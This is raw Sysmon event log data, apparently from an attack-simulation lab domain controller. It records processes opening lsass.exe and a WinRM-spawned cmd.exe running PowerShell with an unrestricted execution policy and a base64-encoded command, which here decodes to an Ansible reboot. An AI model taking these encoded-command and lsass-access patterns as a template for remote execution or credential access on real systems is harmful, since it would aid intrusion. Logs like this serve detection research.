13:08:49.605{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000490Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.605{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000489Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.605{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000488Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.605{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000487Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.605{08A6967A-40D2-6000-0500-000000009901}644768C:\Windows\system32\csrss.exe{08A6967A-4261-6000-E502-000000009901}4048C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000486Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.605{08A6967A-4261-6000-E102-000000009901}48204432C:\Windows\system32\WinrsHost.exe{08A6967A-4261-6000-E502-000000009901}4048C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x8000000000000000485Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.608{08A6967A-4261-6000-E502-000000009901}4048C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{08A6967A-4260-6000-168F-110000000000}0x118f160HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4261-6000-E102-000000009901}4820C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000484Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.605{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000483Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.605{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000482Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.590{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000481Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.543{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000480Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.543{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000479Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.543{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000478Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.215{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-4261-6000-E402-000000009901}4464C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000477Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.215{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-4261-6000-E402-000000009901}4464C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000476Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.168{08A6967A-4261-6000-E402-000000009901}4464C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_i3fzjo1c.mr3.ps12021-01-14 13:08:49.168 10341000x8000000000000000475Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.152{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4261-6000-E402-000000009901}4464C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000474Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.152{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000473Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.152{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000472Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.152{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000471Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.121{08A6967A-4261-6000-E202-000000009901}27884380C:\Windows\system32\conhost.exe{08A6967A-4261-6000-E402-000000009901}4464C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000470Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.121{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000469Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.121{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000468Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 